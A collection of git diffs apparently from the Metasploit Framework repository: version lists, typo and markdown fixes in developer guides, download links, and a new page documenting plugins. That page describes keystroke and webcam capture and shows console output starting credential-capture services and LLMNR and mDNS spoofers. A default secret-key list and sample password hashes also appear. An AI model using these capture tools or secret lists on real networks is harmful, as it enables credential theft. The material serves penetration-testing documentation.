+    "V5_1_9_SNAPSHOT",
+    "V5_1_9",
+    "V5_2_0_SNAPSHOT",
+    "V5_2_0",
+    "V5_2_1_SNAPSHOT",
+    "V5_2_1",
+    "V5_2_2_SNAPSHOT",
+    "V5_2_2",
+    "V5_2_3_SNAPSHOT",
+    "V5_2_3",
+    "V5_2_4_SNAPSHOT",
+    "V5_2_4",
+    "V5_2_5_SNAPSHOT",
+    "V5_2_5",
+    "V5_2_6_SNAPSHOT",
+    "V5_2_6",
+    "V5_2_7_SNAPSHOT",
+    "V5_2_7",
+    "V5_2_8_SNAPSHOT",
+    "V5_2_8",
+    "V5_2_9_SNAPSHOT",
+    "V5_2_9",
+    "V5_3_0_SNAPSHOT",
+    "V5_3_0",
+    "V5_3_1_SNAPSHOT",
+    "V5_3_1",
+    "V5_3_2_SNAPSHOT",
+    "V5_3_2",
+    "V5_3_3_SNAPSHOT",
+    "V5_3_3",
+    "V5_3_4_SNAPSHOT",
+    "V5_3_4",
+    "V5_3_5_SNAPSHOT",
+    "V5_3_5",
+    "V5_3_6_SNAPSHOT",
+    "V5_3_6",
+    "V5_3_7_SNAPSHOT",
+    "V5_3_7",
+    "V5_3_8_SNAPSHOT",
+    "V5_3_8",
+    "V5_3_9_SNAPSHOT",
+    "V5_3_9",
+    "V5_4_0_SNAPSHOT",
+    "V5_4_0",
+    "V5_4_1_SNAPSHOT",
+    "V5_4_1",
+    "V5_4_2_SNAPSHOT",
+    "V5_4_2",
+    "V5_4_3_SNAPSHOT",
+    "V5_4_3",
+    "V5_4_4_SNAPSHOT",
+    "V5_4_4",
+    "V5_4_5_SNAPSHOT",
+    "V5_4_5",
+    "V5_4_6_SNAPSHOT",
+    "V5_4_6",
+    "V5_4_7_SNAPSHOT",
+    "V5_4_7",
+    "V5_4_8_SNAPSHOT",
+    "V5_4_8",
+    "V5_4_9_SNAPSHOT",
+    "V5_4_9",
+    "V5_5_0_SNAPSHOT",
+    "V5_5_0",
+    "V5_5_1_SNAPSHOT",
+    "V5_5_1",
+    "V5_5_2_SNAPSHOT",
+    "V5_5_2",
+    "V5_5_3_SNAPSHOT",
+    "V5_5_3",
+    "V5_5_4_SNAPSHOT",
+    "V5_5_4",
+    "V5_5_5_SNAPSHOT",
+    "V5_5_5",
+    "V5_5_6_SNAPSHOT",
+    "V5_5_6",
+    "V5_5_7_SNAPSHOT",
+    "V5_5_7",
+    "V5_5_8_SNAPSHOT",
+    "V5_5_8",
+    "V5_5_9_SNAPSHOT",
+    "V5_5_9",
+    "V5_6_0_SNAPSHOT",
+    "V5_6_0",
+    "V5_6_1_SNAPSHOT",
+    "V5_6_1",
+    "V5_6_2_SNAPSHOT",
+    "V5_6_2",
+    "V5_6_3_SNAPSHOT",
+    "V5_6_3",
+    "V5_6_4_SNAPSHOT",
+    "V5_6_4",
+    "V5_6_5_SNAPSHOT",
+    "V5_6_5",
+    "V5_6_6_SNAPSHOT",
+    "V5_6_6",
+    "V5_6_7_SNAPSHOT",
+    "V5_6_7",
+    "V5_6_8_SNAPSHOT",
+    "V5_6_8",
+    "V5_6_9_SNAPSHOT",
+    "V5_6_9",
+    "V5_7_0_SNAPSHOT",
+    "V5_7_0",
+    "V5_7_1_SNAPSHOT",
+    "V5_7_1",
+    "V5_7_2_SNAPSHOT",
+    "V5_7_2",
+    "V5_7_3_SNAPSHOT",
+    "V5_7_3",
+    "V5_7_4_SNAPSHOT",
+    "V5_7_4",
+    "V5_7_5_SNAPSHOT",
+    "V5_7_5",
+    "V5_7_6_SNAPSHOT",
+    "V5_7_6",
+    "V5_7_7_SNAPSHOT",
+    "V5_7_7",
+    "V5_7_8_SNAPSHOT",
+    "V5_7_8",
+    "V5_7_9_SNAPSHOT",
+    "V5_7_9",
+    "V5_8_0_SNAPSHOT",
+    "V5_8_0",
+    "V5_8_1_SNAPSHOT",
+    "V5_8_1",
+    "V5_8_2_SNAPSHOT",
+    "V5_8_2",
+    "V5_8_3_SNAPSHOT",
+    "V5_8_3",
+    "V5_8_4_SNAPSHOT",
+    "V5_8_4",
+    "V5_8_5_SNAPSHOT",
+    "V5_8_5",
+    "V5_8_6_SNAPSHOT",
+    "V5_8_6",
+    "V5_8_7_SNAPSHOT",
+    "V5_8_7",
+    "V5_8_8_SNAPSHOT",
+    "V5_8_8",
+    "V5_8_9_SNAPSHOT",
+    "V5_8_9",
+    "V5_9_0_SNAPSHOT",
+    "V5_9_0",
+    "V5_9_1_SNAPSHOT",
+    "V5_9_1",
+    "V5_9_2_SNAPSHOT",
+    "V5_9_2",
+    "V5_9_3_SNAPSHOT",
+    "V5_9_3",
+    "V5_9_4_SNAPSHOT",
+    "V5_9_4",
+    "V5_9_5_SNAPSHOT",
+    "V5_9_5",
+    "V5_9_6_SNAPSHOT",
+    "V5_9_6",
+    "V5_9_7_SNAPSHOT",
+    "V5_9_7",
+    "V5_9_8_SNAPSHOT",
+    "V5_9_8",
+    "V5_9_9_SNAPSHOT",
+    "V5_9_9",
+    "HIGHER_VERSION"
+ ]
@@ -0,0 +1,5 @@
+\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
+CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
+thisISaSECRET_1234
+YOUR_OWN_RANDOM_GENERATED_SECRET_KEY
+TEST_NON_DEV_SECRET
@@ -57,3 +57,5 @@ woocommerce-abandoned-cart
 elementor
 bookingpress
 paid-memberships-pro
+woocommerce-payments
+file-manager-advanced-shortcode
@@ -93,7 +93,7 @@ One advantage that this directory structure gives us is the ability to write bet

 ### Shared build tasks

-Because all routine module-oriented tasks will be preformed with rake tasks, we will need to make the default actions for these tasks as intelligent and reusable as possible across different module types/implementations. A module author should not have to worry about writing plumbing they do not need (or is common) or messing with plumbing that is only tangentially related to their unique need. To that end, we should have sane defaults for the following at a minimum:
+Because all routine module-oriented tasks will be performed with rake tasks, we will need to make the default actions for these tasks as intelligent and reusable as possible across different module types/implementations. A module author should not have to worry about writing plumbing they do not need (or is common) or messing with plumbing that is only tangentially related to their unique need. To that end, we should have sane defaults for the following at a minimum:

 ```
 rake run -- Start module, hook up stdin/stdout to JSON-RPC
@@ -115,4 +115,4 @@ At the very least, we will also need tooling to create a mostly-empty but runnab

 ### For classic modules

-The biggest differences for classic modules are metadata generation and running. These can be accomplished with rake tasks, but it would involve starting up a whole framework instance for each module run. For efficiency, we will need to signal to framework to treat the module specially, perhaps having rake deps:check output/return a specific value when the module needs to be run inside of framework. Metadata would then be dumped directly from the framework loader, and instead of rake run, the classic module loader/runner would be run much as it is today. We will probably want to keep the rake tasks for these things for when we don't already have a framework instance handy.
+The biggest differences for classic modules are metadata generation and running. These can be accomplished with rake tasks, but it would involve starting up a whole framework instance for each module run. For efficiency, we will need to signal to framework to treat the module specially, perhaps having rake deps:check output/return a specific value when the module needs to be run inside of framework. Metadata would then be dumped directly from the framework loader, and instead of rake run, the classic module loader/runner would be run much as it is today. We will probably want to keep the rake tasks for these things for when we don't already have a framework instance handy.
@@ -106,7 +106,7 @@ Enter passphrase: [...]

 2. Modify your `.git/config` file to enable signing commits and merges by default:

-````
+```ini
 [user]
  name = Your Name
  email = your_email@example.com
@@ -114,7 +114,7 @@ Enter passphrase: [...]
 [alias]
  c = commit -S --edit
  m = merge -S --no-ff --edit
-````
+```

 Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.

@@ -58,7 +58,7 @@ You probably shouldn't run proof of concept exploit code you find on the Interne

 Also, please take a peek at our guides on using git and our acceptance guidelines for new modules in case you're not familiar with them.

-If you get stuck, try to explain your specific problem as best you can on our [Freenode IRC](https://freenode.net/) channel, #metasploit (joining requires a [registered nick](https://freenode.net/kb/answer/registration)). Someone should be able to lend a hand. Apparently, some of those people never sleep.
+If you get stuck, try to explain your specific problem as best you can on our [Freenode IRC](https://freenode.net/) channel, #metasploit (joining requires a [registered nick](https://freenode.net/view/Nick_Registration)). Someone should be able to lend a hand. Apparently, some of those people never sleep.

 # Thank you

@@ -147,7 +147,7 @@ This method is just a stub on the Base mixin. It will be overridden in each Logi

 For an example let's look at the attempt_login method from `Metasploit::Framework::LoginScanner::FTP (lib/metasploit/framework/login_scanner/ftp.rb)`
 
- ```ruby
+```ruby
 # (see Base#attempt_login)
 def attempt_login(credential)
  result_options = {
@@ -156,7 +156,7 @@ def attempt_login(credential)

  begin
    success = connect_login(credential.public, credential.private)
-  rescue ::EOFError,  Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
+  rescue ::EOFError,  Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionProxyError, Rex::ConnectionTimeout, Rex::TimeoutError, Errno::ECONNRESET, Errno::EINTR, ::Timeout::Error
    result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
    success = false
  end
@@ -170,7 +170,7 @@ def attempt_login(credential)

  ::Metasploit::Framework::LoginScanner::Result.new(result_options)
 end
- ```
+```
 
 ### scan!

@@ -12,8 +12,12 @@ The pgp signatures below can be verified with the following [public key](https:/

 |Download Link|File Type|SHA1|PGP|
 |-|-|-|-|
-| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.asc)|
+| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.asc)|
 | [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc)|
 | [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.asc)|
 | [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc)|
@@ -28,7 +28,7 @@ Difficulty: 3/5

 ### Enhance Sql Injection Support

-Enable faster implementation of SQL injection based explot modules by adding library support for common injection attack vectors. Currently very few sql injection exploits are implemented for Metasploit possibly due to the high complexity of building out injection queries and posting them to a vulnerable URI.
+Enable faster implementation of SQL injection based exploit modules by adding library support for common injection attack vectors. Currently very few sql injection exploits are implemented for Metasploit possibly due to the high complexity of building out injection queries and posting them to a vulnerable URI.

 Difficulty: 3/5

@@ -6,7 +6,7 @@ Mentors: [@zerosteiner](https://github.com/zerosteiner), [@jmartin-r7](https://g

 ### Retain active status of authentication tokens

-Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for regstering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authenticaion tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.
+Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for registering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authenticaion tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.

 Difficulty: 2/5

@@ -31,7 +31,7 @@ Difficulty: 3/5

 ### Enhanced LDAP Query & Collection

-When preforming security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service. 
+When performing security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service. 

 Size: Medium/Large (Depends on proposal)  
 Difficulty: 3/5
@@ -35,7 +35,7 @@ But of course, to begin, you most likely need a template to work with, and here

 ```ruby
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

@@ -141,7 +141,7 @@ creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D48
 creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12
 creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
 creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
-## oracle (10) uses usernames in the hashing, so we can't overide that here
+## oracle (10) uses usernames in the hashing, so we can't override that here
 creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
 creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
 ## oracle 11/12 H value, username is used
@@ -149,7 +149,7 @@ creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C
 ## oracle 11/12 uses a LONG format, see lib/msf/core/auxiliary/jtr.rb
 creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
 creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
-## postgres uses username, so we can't overide that here
+## postgres uses username, so we can't override that here
 creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
 ## other
 creds add user:hmac_password hash:'<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9' jtr:hmac-md5
@@ -0,0 +1,155 @@
+Metasploit plugins can change the behavior of Metasploit framework by adding new features, new user interface commands, and more.
+They are designed to have a very loose definition in order to make them as useful as possible.
+
+Plugins are not available by default, they need to be loaded:
+
+```msf
+msf6 > load plugin_name
+```
+
+Plugins can be automatically loaded and configured on msfconsole's start up by configuring a custom `~/.msf4/msfconsole.rc` file:
+
+```
+load plugin_name
+plugin_name_command --option
+```
+
+## Available Plugins
+
+The current available plugins for Metasploit can be found by running the `load -l` command, or viewing Metasploit's [plugins](https://github.com/rapid7/metasploit-framework/tree/master/plugins) directory:
+
+| name             | Description                                                                                         |
+|------------------|-----------------------------------------------------------------------------------------------------|
+| aggregator       | Interacts with the external Session Aggregator                                                      |
+| alias            | Adds the ability to alias console commands                                                          |
+| auto_add_route   | Adds routes for any new subnets whenever a session opens                                            |
+| beholder         | Capture screenshots, webcam pictures, and keystrokes from active sessions                           |
+| besecure         | Integrates with the beSECURE - open source vulnerability management                                 |
+| capture          | Start all credential capture and spoofing services                                                  |
+| db_credcollect   | Automatically grab hashes and tokens from Meterpreter session events and store them in the database |
+| db_tracker       | Monitors socket calls and updates the database backend                                              |
+| event_tester     | Internal test tool used to verify the internal framework event subscriber logic works               |
+| ffautoregen      | This plugin reloads and re-executes a file-format exploit module once it has changed                |
+| ips_filter       | Scans all outgoing data to see if it matches a known IPS signature                                  |
+| lab              | Adds the ability to manage VMs                                                                      |
+| libnotify        | Send desktop notification with libnotify on sessions and db events                                  |
+| msfd             | Provides a console interface to users over a listening TCP port                                     |
+| msgrpc           | Provides a MessagePack interface over HTTP                                                          |
+| nessus           | Nessus Bridge for Metasploit                                                                        |
+| nexpose          | Integrates with the Rapid7 Nexpose vulnerability management product                                 |
+| openvas          | Integrates with the OpenVAS - open source vulnerability management                                  |
+| pcap_log         | Logs all socket operations to pcaps (in /tmp by default)                                            |
+| request          | Make requests from within Metasploit using various protocols.                                       |
+| rssfeed          | Create an RSS feed of events                                                                        |
+| sample           | Demonstrates using framework plugins                                                                |
+| session_notifier | This plugin notifies you of a new session via SMS                                                      |
+| session_tagger   | Automatically interacts with new sessions to create a new remote TaggedByUser file                  |
+| socket_logger    | Log socket operations to a directory as individual files                                            |
+| sounds           | Automatically plays a sound when various framework events occur                                     |
+| sqlmap           | sqlmap plugin for Metasploit                                                                        |
+| thread           | Internal test tool for testing thread usage in Metasploit                                          |
+| token_adduser    | Attempt to add an account using all connected Meterpreter session tokens                            |
+| token_hunter     | Search all active Meterpreter sessions for specific tokens                                          |
+| wiki             | Outputs stored database values from the current workspace into DokuWiki or MediaWiki format         |
+| wmap             | Web assessment plugin                                                                               |
+
+## Examples
+
+### Alias Plugin
+
+The Alias plugin adds the ability to alias console commands:
+
+```msf
+msf6 > load alias
+[*] Successfully loaded plugin: alias
+msf6 > alias -h
+Usage: alias [options] [name [value]]
+
+OPTIONS:
+
+    -c   Clear an alias (* to clear all).
+    -f   Force an alias assignment.
+    -h   Help banner.
+```
+
+Register an alias such as `proxy_enable`:
+
+```msf
+msf6 > alias proxy_enable "set Proxies http:localhost:8079"
+```
+
+Now when running the aliased `proxy_enable` command, the proxy datastore value will be set for the current module:
+
+```msf
+msf6 auxiliary(scanner/http/title) > proxy_enable
+Proxies => http:localhost:8079
+```
+
+Viewing registered aliases:
+
+```msf
+msf6 > alias
+
+Current Aliases
+===============
+
+       Alias Name    Alias Value
+       ----------    -----------
+alias  proxy_enable  set Proxies http:localhost:8079
+
+```
+
+To automatically load and configure the alias plugin on startup of Metasploit, create a custom `~/.msf4/msfconsole.rc` file:
+
+```
+load alias
+alias proxy_enable "set Proxies http:localhost:8079"
+alias proxy_disable "unset Proxies"
+alias routes "route print"
+```
+
+### Capture Plugin
+
+Capturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has
+facilitated this for years with protocol-specific modules all under the `modules/auxiliary/server/capture` directory. Users can start and configure
+each of these modules individually, but now the capture plugin can streamline the process. The capture plugin can easily start 13
+different services (17 including SSL enabled versions) on the same listening IP address including remote interfaces via Meterpreter.
+A configuration file can be used to select individual services to start and once finished, all services can easily be stopped
+using a single command.
+
+To use the plugin, it must first be loaded. That will provide the `captureg` command (for Capture-Global) which then offers start
+and stop subcommands. In the following example, the plugin is loaded, and then all default services are started on the 192.168.159.128 interface.
+
+```msf
+msf6 > load capture
+[*] Successfully loaded plugin: Credential Capture
+msf6 > captureg start --ip 192.168.159.128
+Logging results to /home/smcintyre/.msf4/logs/captures/capture_local_20220325104416_589275.txt
+Hash results stored in /home/smcintyre/.msf4/loot/captures/capture_local_20220325104416_612808
+[+] Authentication Capture: DRDA (DB2, Informix, Derby) started
+[+] Authentication Capture: FTP started
+[+] HTTP Client MS Credential Catcher started
+[+] HTTP Client MS Credential Catcher started
+[+] Authentication Capture: IMAP started
+[+] Authentication Capture: MSSQL started
+[+] Authentication Capture: MySQL started
+[+] Authentication Capture: POP3 started
+[+] Authentication Capture: PostgreSQL started
+[+] Printjob Capture Service started
+[+] Authentication Capture: SIP started
+[+] Authentication Capture: SMB started
+[+] Authentication Capture: SMTP started
+[+] Authentication Capture: Telnet started
+[+] Authentication Capture: VNC started
+[+] Authentication Capture: FTP started
+[+] Authentication Capture: IMAP started
+[+] Authentication Capture: POP3 started
+[+] Authentication Capture: SMTP started
+[+] NetBIOS Name Service Spoofer started
+[+] LLMNR Spoofer started
+[+] mDNS Spoofer started
+[+] Started capture jobs
+msf6 >
+```
+
+This content was originally posted on the [Rapid7 Blog](https://www.rapid7.com/blog/post/2022/03/25/metasploit-weekly-wrap-up-154/).
@@ -62,9 +62,9 @@ res = @http_client.send_request_cgi({
 The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests.

 ### `cookie` option
-Shown below is the request used to login to a gitlab account in the [artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)
+Shown below is the request used to login to a gitlab account in the [artica\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)

-artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection requires a specific cookie header to be sent with a request in order to achieve RCE. By setting a string of the desired header as the value of the `cookie` option, that string is set as the cookie header without any changes, allowing the exploit to be carried out.
+artica\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection requires a specific cookie header to be sent with a request in order to achieve RCE. By setting a string of the desired header as the value of the `cookie` option, that string is set as the cookie header without any changes, allowing the exploit to be carried out.

 ```ruby
 res = send_request_cgi({
@@ -49,7 +49,7 @@ Here's the most basic example of an auxiliary module. We'll explain a bit more a

 ```ruby
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

@@ -86,7 +86,7 @@ Because the ```Msf::Auxiliary::Scanner``` mixin is so popular, we figured you wa

 ```ruby
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

@@ -38,7 +38,7 @@ For debugging purposes, it's always better to turn on the highest level of loggi

 There are mainly five logging methods you will most likely be using a lot, and they all have the exact same arguments. Let's use one of the logging methods to explain what these arguments are about:

-```
+```ruby
 def elog(msg, src = 'core', level = 0, from = caller)
 ```

@@ -50,7 +50,7 @@ And then you are ready to go.

 The first thing you do with ObfuscateJS is you need to initialize it with the JavaScript you want to obfuscate, so in this case, begin like the following:

-```
+```ruby
 js = %Q|
 var arrr = new Array();
 arrr[0] = windows.document.createElement("img");
@@ -82,7 +82,7 @@ So if I want to obfuscate the variable ```arrr```, and I want to obfuscate the s

 In some cases, you might actually want to know the obfuscated version of a symbol name. One scenario is calling a JavaScript function from an element's event handler, such as this:

-```
+```html
 <html>
 <head>
 <script>
@@ -150,7 +150,7 @@ This time we'll do a "hello world" example:

 And here's the output:

-```
+```javascript
 window[(function () { var _d="t",y="ler",N="a"; return N+y+_d })()]((function () { var f='d!',B='orl',Q2='h',m='ello, w'; return Q2+m+B+f })());
 ```

@@ -24,7 +24,7 @@ int main(void) {
 require 'metasploit/framework/compiler/windows'


-## Save as an exe varibale
+## Save as an exe variable
 exe = Metasploit::Framework::Compiler::Windows.compile_c(c_template)

 ## Save the binary as a file
@@ -119,4 +119,4 @@ int main() {
 outfile = "/tmp/helloworld.exe"
 weight = 70 # This value is used to determine how random the code gets.
 Metasploit::Framework::Compiler::Windows.compile_random_c_to_file(outfile, c_source_code, weight: weight)
-```
+```
@@ -89,7 +89,7 @@ First ensure you are running the Metasploit database, and are running the JSON s

 Request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Content-Type: application/json' \
@@ -118,7 +118,7 @@ Response:

 Request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Content-Type: application/json' \
@@ -155,7 +155,7 @@ Response:

 Request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'content-type: application/json' \
@@ -185,7 +185,7 @@ Response:
 Metasploit modules support running `check` methods which can be used to identify the success of an exploit module, or to run an
 auxiliary module against a target. For instance, with an Auxiliary module check request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Content-Type: application/json' \
@@ -205,7 +205,7 @@ curl --request POST \

 Or an Exploit module check request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'content-type: application/json' \
@@ -240,7 +240,7 @@ The response will contain an identifier which can be used to query for updates:

 Request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Content-Type: application/json' \
@@ -288,7 +288,7 @@ It is possible to poll for module results using the id returned when running a m

 Request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Content-Type: application/json' \
@@ -353,7 +353,7 @@ but the memory is limited to 35mb as the memory datastore used is implemented by

 Request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Content-Type: application/json' \
@@ -445,7 +445,7 @@ curl --request POST \

 Run the analyze command:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Authorization: Bearer ' \
@@ -491,7 +491,7 @@ Response:

 When analyzing a host, it is also possible to specify payload requirements for additional granularity:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Authorization: Bearer ' \
@@ -128,7 +128,7 @@ The best way to let the user decide what kind of payload to use is by defining s

 Here is an example targets section from a command injection module:

-```
+```ruby
    'Targets' => [
      [
        'Unix Command',
@@ -279,7 +279,7 @@ msf exploit(cmdstager_demo) > run
 # Flavors

 Now that we know how to use the `Msf::Exploit::CmdStager` mixin, let's take a look at the command
